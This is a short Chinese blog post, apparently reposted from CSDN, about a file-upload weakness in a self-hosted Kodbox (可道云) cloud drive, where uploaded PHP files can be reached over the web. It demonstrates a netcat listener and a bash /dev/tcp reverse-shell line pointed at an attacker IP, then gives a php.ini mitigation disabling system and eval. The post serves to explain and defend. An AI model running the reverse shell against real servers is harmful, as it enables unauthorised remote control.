部署可道云网盘的一个漏洞解决

2024-01-08 05:58:18

?

目录

?

1漏洞展示

2.防范措施?


1漏洞展示

因为可道云网盘的上传文档有保存在 /data/Group/public/home/文档/ 中,当别有用心之人知道个人部署的域名与上次的文件后,可以进行访问拿到uid。例我在我部署的网盘上上次一个aa.php 文件,然后拿来演示

?然后通过域名与路径在浏览器上访问拿到uid ,对用户进行访问控制

UID(用户标识)可以用于识别用户或实体的唯一标识符。它可以用于访问特定用户的个人资料、记录用户的活动、管理用户权限和访问控制、跟踪用户行为等。在不同的系统和应用程序中,UID可以用于各种目的,例如身份验证、授权、数据分析等。UID的用途取决于具体的应用场景和需求。?

?2)反弹shell?

这样别人就可以在他个人虚拟机上安装 nc?

yum install nc -y

?开启监听

nc -lvnp 9999

?然后他就在访问的文件中添加bash ,即将访问控制发生给他个人的 主机上

xxxx -i >& /dev/tcp/192.168.XX.XXX/9999 0>&1 
#xxxx表示bash
# 攻击机的ip地址:192.168.XX.XXX
# 攻击机nc监听的端口:9999

?然后他再次访问,就可以拿到控制权限

2.防范措施?

禁用 system 函数

vim /etc/php.ini
# 修改314行
314 disable_functions = system,eval
# 重启php-fpm
systemctl restart php-fpm.service 
# 然后再监听,再访问就发现反弹不了了。

?步骤,来到 vim 下,没进入编辑前,先 :/disable ,即查找关键字disable;然后:set number ,显示行数,找到314 行,进行修改

再次监听后就拿不到 uid 了

文章来源:https://blog.csdn.net/m0_60494863/article/details/135446973
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。